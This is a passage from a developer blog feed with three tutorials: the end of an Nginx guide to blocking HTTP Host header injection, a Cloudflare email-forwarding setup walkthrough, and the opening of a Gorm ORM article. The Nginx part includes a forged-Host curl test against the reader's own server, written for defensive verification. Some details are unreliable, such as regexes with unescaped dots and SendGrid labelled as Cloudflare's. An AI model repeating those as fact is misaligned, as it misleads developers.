&lt;p&gt;If your application has multiple legitimate domain names (such as main site devresourcehub.com, subsite tools.devresourcehub.com, local test localhost), you can implement a whitelist using regular expressions or multi-condition judgment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Method 1: Regular Expression Matching (Concise)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
server {
    listen 80;
    server_name devresourcehub.com;

    set $host_flag 0;
    # Regular expression matches multiple legitimate domain names, separated by |
    if ($host ~* "^(devresourcehub.com|tools.devresourcehub.com|localhost)$") {set $host_flag 1;}
    if ($host_flag = 0) {return 403;}

    location / {
        root /www/h5;
        index index.php index.html index.htm;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Method 2: Multi-Condition Judgment (Higher Readability)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
set $host_flag 0;
if ($host == "devresourcehub.com") {set $host_flag 1;}
if ($host == "tools.devresourcehub.com") {set $host_flag 1;}
if ($host == "localhost") {set $host_flag 1;}
if ($host_flag = 0) {return 403;}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Scheme 3: Regular Expression Matching IP + Domain Name (Special Scenarios)
&lt;/h3&gt;

&lt;p&gt;If you need to allow access from specific IP segments (such as internal network testing), you can combine IP and domain name for regular expression matching. But note: the more complex the regular expression, the higher the maintenance cost. Exact matching is preferred in the production environment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
server {
    listen 80;
    server_name devresourcehub.com;

    # Allow domain name + specified IP segment + local loopback address
    if ($http_Host !~* "^(devresourcehub.com|192.168.10.\d{1,3}|127.0.0.1)$") {return 403;}

    location / {
        root /www/h5;
        index index.php index.html index.htm;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note: The &lt;code&gt;.&lt;/code&gt; in the regular expression needs to be escaped to &lt;code&gt;\.&lt;/code&gt;, otherwise it will match any character; the IP segment is only basically restricted with &lt;code&gt;\d{1,3}&lt;/code&gt;, which cannot completely prevent illegal IPs.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. How to Verify Whether the Protection Takes Effect?
&lt;/h2&gt;

&lt;p&gt;After the configuration is completed, use the curl command to test two scenarios to ensure the protection takes effect:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Normal Access (Should Return 200)&lt;/strong&gt; : &lt;code&gt;curl -I -H "Host: devresourcehub.com" http://your-server-ip/&lt;/code&gt; Returns status code 200 OK, indicating that the legitimate Host passes.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Forged Host (Should Return 403)&lt;/strong&gt; : &lt;code&gt;curl -I -H "Host: evil.com" http://your-server-ip/&lt;/code&gt; Returns 403 Forbidden, indicating that the illegal Host is blocked.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  5. 2025 Host Header Defense Best Practices
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Back-End Does Not Depend on Host Header&lt;/strong&gt;: Even if Nginx does the verification, the back-end should use the fixed domain name in the configuration file when generating URLs, instead of $_SERVER[‘HTTP_HOST’] or $host.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Default Server Block Rejects Access&lt;/strong&gt;: Ensure that the default_server block of Nginx does not return any sensitive content. It is recommended to configure it as: &lt;code&gt;server {listen 80 default_server; return 444;}&lt;/code&gt; (444 means closing the connection without response).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Record Illegal Request Logs&lt;/strong&gt;: Record logs for intercepted illegal requests to facilitate subsequent analysis of attack sources: &lt;code&gt;if ($host_flag = 0) {&lt;/code&gt;&lt;code&gt;access_log /var/log/nginx/host_attack.log;&lt;/code&gt;&lt;code&gt;return 403;&lt;/code&gt;&lt;code&gt;}&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Regularly Audit Configuration&lt;/strong&gt;: When the domain name is changed or added, update the Host whitelist of Nginx in time to avoid normal requests being blocked.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;HTTP Host header attack (Host Header Injection) is subtle but has extremely low defense cost. Through simple configuration at the Nginx layer, most attack attempts can be effectively blocked. It is recommended to use &lt;strong&gt;Scheme 1 (Single Domain Name Flag Bit)&lt;/strong&gt;  or &lt;strong&gt;Scheme 2 (Multi-Domain Exact Match)&lt;/strong&gt;  first, which takes into account both security and maintainability. Remember: The core of web security is “not trusting any client input”. Only by starting from the details can a truly solid defense system be built.&lt;/p&gt;

</description>
      <category>nginx</category>
      <category>http</category>
    </item>
    <item>
      <title>Cloudflare Custom Domain Email Tutorial: 3 Steps to Build a Professional Brand Email (with DNS Setup)</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Mon, 03 Nov 2025 09:42:14 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/cloudflare-custom-domain-email-tutorial-3-steps-to-build-a-professional-brand-email-with-dns-m3i</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/cloudflare-custom-domain-email-tutorial-3-steps-to-build-a-professional-brand-email-with-dns-m3i</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;Zero-cost Cloudflare Custom Domain Email Tutorial: Build professional brand emails like &lt;a href="mailto:contact@yourdomain.com"&gt;contact@yourdomain.com&lt;/a&gt; in 3 steps. Includes DNS setup guide, takes 10 mins for beginners, boosts trust for indie sites, blogs &amp;amp; SaaS products.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/cloudflare-custom-domain-email-tutorial-3-steps-to-build-a-professional-brand-email-with-dns-setup.html" rel="noopener noreferrer"&gt;Cloudflare Custom Domain Email Tutorial: 3 Steps to Build a Professional Brand Email (with DNS Setup)&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When running an independent website, personal blog, or SaaS product, are you still using personal email accounts like Gmail or Outlook for external communication? This actually hurts your brand professionalism significantly—imagine the trust gap when a customer receives a business email from &lt;a href="mailto:xxx@live.com"&gt;xxx@live.com&lt;/a&gt; versus one from &lt;a href="mailto:contact@yourdomain.com"&gt;contact@yourdomain.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Today, I’ll share a zero-cost method to set up a custom domain email using Cloudflare. It takes less than 10 minutes total, and even beginners can follow along.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Prerequisites: What You’ll Need
&lt;/h2&gt;

&lt;p&gt;There’s only one core requirement: &lt;strong&gt;a domain name already hosted on Cloudflare&lt;/strong&gt;. If your domain isn’t transferred yet, simply add it on the Cloudflare official website and follow the prompts to complete DNS resolution migration (there are plenty of tutorials online, and it’s not difficult to operate, so I won’t go into detail here).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagva02gsf83rz805z3v0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagva02gsf83rz805z3v0.png" width="800" height="412"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The image above shows my domain list in Cloudflare, where devresourcehub.com is the domain of this site.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Step-by-Step Guide: Set Up Custom Email in 3 Steps
&lt;/h2&gt;

&lt;p&gt;My domain is devresourcehub.com (which is also the address of my blog). Next, I’ll use this domain as an example to set up a custom email like &lt;a href="mailto:contact@devresourcehub.com"&gt;contact@devresourcehub.com&lt;/a&gt; step by step.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Access the Domain’s Email Routing Page
&lt;/h3&gt;

&lt;p&gt;After logging into Cloudflare, find the domain you want to set up in the domain list on the homepage (such as my devresourcehub.com) and click to enter the domain management backend. Locate “Email” – “Email Routing” in the left sidebar menu and click to enter the function page.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fallb4dnmc25c4x0yi6vh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fallb4dnmc25c4x0yi6vh.png" width="800" height="416"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Create a Custom Email Address
&lt;/h3&gt;

&lt;p&gt;On the Email Routing page, click “Get Started” and fill in the relevant information in the subsequent form:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Custom Address&lt;/strong&gt;: Enter the email prefix. For example, if I want a dedicated contact email for the website, I’ll enter “contact”, and the final email will be &lt;a href="mailto:contact@devresourcehub.com"&gt;contact@devresourcehub.com&lt;/a&gt;. For other types of emails, you can use common prefixes like your “name” or “support”.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Action&lt;/strong&gt;: Select “Send to email” (beginners can start with the basic forwarding function; advanced features like setting rules can be explored later).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Destination&lt;/strong&gt;: Enter your personal email (such as Microsoft Outlook or Gmail). All future emails sent to the custom email will be forwarded here.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6knp71to25yatjjbycg9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6knp71to25yatjjbycg9.png" width="800" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z3b9gyf7pxe5m8jfynu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z3b9gyf7pxe5m8jfynu.png" width="800" height="523"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Complete Email Verification and DNS Configuration
&lt;/h3&gt;

&lt;p&gt;After clicking “Save”, Cloudflare will send a verification email to the destination email you entered. Open the email and click the verification link to confirm that the email can receive messages normally.&lt;/p&gt;

&lt;p&gt;After verification, the system will prompt you to configure DNS records—don’t worry, Cloudflare has already generated the required records for you. Just click “Add records and enable” to complete the configuration automatically; no manual modification of DNS parameters is needed.&lt;/p&gt;

&lt;p&gt;Since my destination email is the same as my Cloudflare account email, no verification was required, and it was set up directly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08an3krdb89eoij7f1dn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08an3krdb89eoij7f1dn.png" width="800" height="412"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Final Step: Test if the Email Works
&lt;/h2&gt;

&lt;p&gt;After configuration, be sure to test it with another email (such as a friend’s email or another personal email): send an email to the custom domain email you just created (e.g., &lt;a href="mailto:zhangsihai@indiecoder.me"&gt;zhangsihai@indiecoder.me&lt;/a&gt;) and then check if the destination personal email receives it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr780lv53ak1ggle8zw57.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr780lv53ak1ggle8zw57.png" width="772" height="410"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it’s received normally, the entire process is successful. If not, first check if the DNS configuration has taken effect (there may be a 1-5 minute delay), then confirm the spam folder of the destination email.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frnkk7ivejs9c9i63qxls.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frnkk7ivejs9c9i63qxls.png" width="800" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After testing, I found that forwarding works successfully, as shown in the image above.&lt;/p&gt;

&lt;p&gt;If you still can’t find the email even after checking the spam folder, you can check the logs in Cloudflare. For example, when I used a Microsoft email, the Microsoft email server added the IP of the forwarding email server to the blacklist, causing forwarding failure. The solution is either to contact the customer service of the destination email server or switch to another destination email.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ys4hm4curckwtca5io4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ys4hm4curckwtca5io4.png" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Tips: If you want your custom email to send emails directly (not just receive and forward), you can pair it with Cloudflare’s SendGrid or other SMTP services. However, for most personal bloggers and small website owners, simple receiving and forwarding is sufficient.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In this way, you’ll have a professional brand email tied to your domain. Whether it’s for external communication, user feedback, or business cooperation, it can enhance your brand image and trust. The entire process is completely free and easy to operate—if you haven’t set it up yet, give it a try!&lt;/p&gt;

</description>
      <category>cloudflare</category>
      <category>mail</category>
    </item>
    <item>
      <title>A Deep Dive into Gorm: Architecture, Workflow, Tips, and Troubleshooting for Go’</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sun, 02 Nov 2025 11:15:11 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/a-deep-dive-into-gorm-architecture-workflow-tips-and-troubleshooting-for-go-2ld9</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/a-deep-dive-into-gorm-architecture-workflow-tips-and-troubleshooting-for-go-2ld9</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This article details the internal architecture and SQL execution workflow of Gorm, the popular ORM framework for Go. It shares practical techniques for model definition, querying, and updating, while solving common issues like time zone discrepancies, soft deletion, and transactions. It is tailored for &lt;strong&gt;advanced Gorm developers&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/a-deep-dive-into-gorm-architecture-workflow-tips-and-troubleshooting-for-gos-orm-framework.html" rel="noopener noreferrer"&gt;Dev Resource Hub&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As the most widely used ORM (Object-Relational Mapping) framework in the Go ecosystem, Gorm significantly simplifies database operations. However, most developers only utilize its basic features and have limited knowledge of its internal logic and advanced techniques. Starting from Gorm’s core principles, this article combines real-world development scenarios to outline its SQL execution workflow, practical functions, and common pitfalls, helping you move from “knowing how to use it” to “mastering it”.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Gorm Core Concepts &amp;amp; Architecture
&lt;/h2&gt;

&lt;p&gt;To use Gorm proficiently, you first need to understand its design logic. At its heart, Gorm is a “SQL codification tool” that converts developer method calls into SQL statements and interacts with the database.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 What is ORM?
&lt;/h3&gt;

&lt;p&gt;ORM (Object-Relational Mapping) serves as a bridge between code and databases, with three core functions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Mapping database tables to Go structs&lt;/li&gt;
&lt;li&gt;  Mapping table columns to struct fields&lt;/li&gt;
&lt;li&gt;  Converting struct operations to SQL statements&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Its advantages are clear:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  No need to write raw SQL&lt;/li&gt;
&lt;li&gt;  Reduces error rates&lt;/li&gt;
&lt;li&gt;  Supports multiple databases (MySQL, PostgreSQL, etc.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;However, it also has limitations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Auto-generated SQL may not be optimal&lt;/li&gt;
&lt;li&gt;  Requires learning framework-specific rules&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1.2 Gorm Code Architecture
&lt;/h3&gt;

&lt;p&gt;Gorm uses several core objects to 实现 “method-to-SQL conversion”. Understanding these objects is key to grasping its overall logic:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Object&lt;/th&gt;
&lt;th&gt;Core Role&lt;/th&gt;
&lt;th&gt;Key Attributes / Functions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;DB&lt;/td&gt;
&lt;td&gt;Database connection instance&lt;/td&gt;
&lt;td&gt;Manages connections, stores configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config&lt;/td&gt;
&lt;td&gt;Stores user settings&lt;/td&gt;
&lt;td&gt;Controls plural table names, DryRun mode, prepared statements, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Statement&lt;/td&gt;
&lt;td&gt;Maps SQL statements&lt;/td&gt;
&lt;td&gt;Stores WHERE conditions, SELECT fields, table names, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Schema&lt;/td&gt;
&lt;td&gt;Maps database table structures&lt;/td&gt;
&lt;td&gt;Associates structs with table names and field mappings&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Field&lt;/td&gt;
&lt;td&gt;Maps table column details&lt;/td&gt;
&lt;td&gt;Stores column names, data types, primary key/non-null status, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Gorm’s methods fall into two categories, and the method chain follows a process of “assembling SQL → executing SQL”:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Process methods&lt;/strong&gt;: Only assemble SQL (no execution), e.g., &lt;code&gt;Where&lt;/code&gt; (add conditions), &lt;code&gt;Select&lt;/code&gt; (specify fields), &lt;code&gt;Model&lt;/code&gt; (bind a struct).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Terminator methods&lt;/strong&gt;: Execute SQL after assembly and parse results, e.g., &lt;code&gt;Find&lt;/code&gt; (query), &lt;code&gt;Create&lt;/code&gt; (insert), &lt;code&gt;Update&lt;/code&gt; (update), &lt;code&gt;Delete&lt;/code&gt; (delete).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1.3 Relationship Between trpc-go/gorm and Native Gorm
&lt;/h3&gt;

&lt;p&gt;If your project uses the trpc-go framework, you may encounter the &lt;code&gt;trpc-go/trpc-database/gorm&lt;/code&gt; package. It is not a reimplementation of Gorm but a wrapper for native Gorm, with three core advantages:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Simplifies database connection configuration, eliminating repetitive initialization code.&lt;/li&gt;
&lt;li&gt; Integrates Gorm into trpc-go services, supporting unified framework configuration.&lt;/li&gt;
&lt;li&gt; Provides Polaris dynamic service discovery for flexible database switching.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  2. How Does a SQL Statement Execute in Gorm?
&lt;/h2&gt;

&lt;p&gt;Let’s take a common Gorm query code snippet and break down its execution process to understand the full workflow from “method call” to “database response”:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var user User
db := db.Model(user).Select("age", "name").Where("age = ?", 18).Or("name = ?", "tencent").Find(&amp;amp;user)
if err := db.Error; err != nil {log.Printf("Find failed, err: %v", err)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.1 Full Execution Workflow
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Preparations
&lt;/h4&gt;

&lt;p&gt;Call &lt;code&gt;gorm.Open()&lt;/code&gt; to create a &lt;code&gt;DB&lt;/code&gt; object based on the database type (e.g., MySQL) and DSN, then initialize the connection.&lt;/p&gt;

&lt;h4&gt;
  
  
  SQL Assembly (Process Methods)
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;code&gt;Model(user)&lt;/code&gt;: Informs Gorm to operate on the table associated with &lt;code&gt;user&lt;/code&gt; and updates the table name in &lt;code&gt;Statement&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;Select("age", "name")&lt;/code&gt;: Adds the fields to be queried to &lt;code&gt;Statement.Selects&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;Where(...)&lt;/code&gt; and &lt;code&gt;Or(...)&lt;/code&gt;: Parses conditions, generates &lt;code&gt;WHERE age = 18 OR name = 'tencent'&lt;/code&gt;, and stores it in &lt;code&gt;Statement.Clauses&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  SQL Execution (Terminator Method &lt;code&gt;Find&lt;/code&gt;)
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; Checks &lt;code&gt;Statement&lt;/code&gt; and completes the SQL statement (e.g., &lt;code&gt;SELECT age, name FROM users WHERE ...&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt; Calls the database driver’s &lt;code&gt;QueryContext&lt;/code&gt; to send the SQL to the database.&lt;/li&gt;
&lt;li&gt; Receives the database response, parses the results, and populates them into &lt;code&gt;&amp;amp;user&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt; Stores error information, affected row counts, etc., in the &lt;code&gt;DB&lt;/code&gt; object and returns it to the developer.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  2.2 Key Code Snippets
&lt;/h3&gt;

&lt;p&gt;Taking &lt;code&gt;Select&lt;/code&gt; and &lt;code&gt;Where&lt;/code&gt; as examples, here’s how Gorm assembles SQL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Select method: Adds fields to Statement.Selects
func (db *DB) Select(query interface{}, args ...interface{}) (tx *DB) {tx = db.getInstance()
  // Parses incoming fields (e.g., "age" or []string{"age", "name"})
  switch v := query.(type) {
  case string:
    tx.Statement.Selects = append(tx.Statement.Selects, v)
  case []string:
    tx.Statement.Selects = append(tx.Statement.Selects, v...)
  }
  return tx
}

// Where method: Adds conditions to Statement.Clauses
func (db *DB) Where(query interface{}, args ...interface{}) (tx *DB) {tx = db.getInstance()
  // Parses conditions and generates Clause objects
  if conds := tx.Statement.BuildCondition(query, args...); len(conds) &amp;gt; 0 {tx.Statement.AddClause(clause.Where{Exprs: conds})
  }
  return tx
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. Gorm Practical Tips: Filling Knowledge Gaps
&lt;/h2&gt;

&lt;p&gt;Many practical Gorm features are easily overlooked in daily development. Mastering these can significantly improve efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Model Definition Tips
&lt;/h3&gt;

&lt;p&gt;Models are the foundation of Gorm’s database interactions. Pay attention to these details:&lt;/p&gt;

&lt;h4&gt;
  
  
  Controlling Table Name Plurality
&lt;/h4&gt;

&lt;p&gt;Gorm defaults to converting struct names to plural table names (e.g., &lt;code&gt;User&lt;/code&gt; → &lt;code&gt;users&lt;/code&gt;). To disable this, configure it during initialization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;db, err := gorm.Open(mysql.Open(dsn), &amp;amp;gorm.Config{
  NamingStrategy: schema.NamingStrategy{SingularTable: true, // Disable plural table names},
})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Embedding Base Models
&lt;/h4&gt;

&lt;p&gt;Gorm provides a &lt;code&gt;gorm.Model&lt;/code&gt; struct that includes &lt;code&gt;ID&lt;/code&gt;, &lt;code&gt;CreatedAt&lt;/code&gt;, &lt;code&gt;UpdatedAt&lt;/code&gt;, and &lt;code&gt;DeletedAt&lt;/code&gt;. Embed it in your custom struct to avoid redefining these common fields:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;type User struct {
  gorm.Model // Embeds the base model, automatically adding 4 common fields
  Name string
  Age  int
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note: Embedding &lt;code&gt;DeletedAt&lt;/code&gt; automatically enables &lt;strong&gt;soft deletion&lt;/strong&gt; (deletion only updates &lt;code&gt;DeletedAt&lt;/code&gt; instead of physically removing data).&lt;/p&gt;

&lt;h4&gt;
  
  
  Struct Embedding (Embed)
&lt;/h4&gt;

&lt;p&gt;For structs with many fields, split related fields into sub-structs. Use the &lt;code&gt;embedded&lt;/code&gt; tag to associate them, and &lt;code&gt;embeddedPrefix&lt;/code&gt; to add field prefixes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Sub-struct
type Author struct {
  Name  string `gorm:"column:name"`
  Email string `gorm:"column:email"`
}

// Main struct (with embed association)
type Blog struct {
  ID      int    `gorm:"column:id"`
  Author  Author `gorm:"embedded;embeddedPrefix:author_"` // Fields become author_name, author_email
  Upvotes int32  `gorm:"column:upvotes"`
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Query Optimization Tips
&lt;/h3&gt;

&lt;p&gt;Queries are high-frequency operations. Choosing the right method reduces performance overhead:&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;code&gt;First&lt;/code&gt;/&lt;code&gt;Take&lt;/code&gt;/&lt;code&gt;Last&lt;/code&gt; vs. &lt;code&gt;Find&lt;/code&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;First&lt;/code&gt;/&lt;code&gt;Take&lt;/code&gt;/&lt;code&gt;Last&lt;/code&gt;: Return &lt;code&gt;ErrRecordNotFound&lt;/code&gt; if no data is found and automatically add &lt;code&gt;LIMIT 1&lt;/code&gt;. Suitable for “single-record queries” (e.g., query by primary key).&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;Find&lt;/code&gt;: Does not return an error if no data is found and queries all matching records. Suitable for “multi-record queries” or “primary key/unique key equality queries” (avoids extra error checks).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Simplifying Query Conditions
&lt;/h4&gt;

&lt;p&gt;For simple conditions, skip &lt;code&gt;Where&lt;/code&gt; and write conditions directly in &lt;code&gt;Find&lt;/code&gt; for cleaner code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Equivalent to: db.Where("status = ? and update_time &amp;lt; ?", 1, time.Now()).Find(&amp;amp;user)
db.Find(&amp;amp;user, "status = ? and update_time &amp;lt; ?", 1, time.Now())
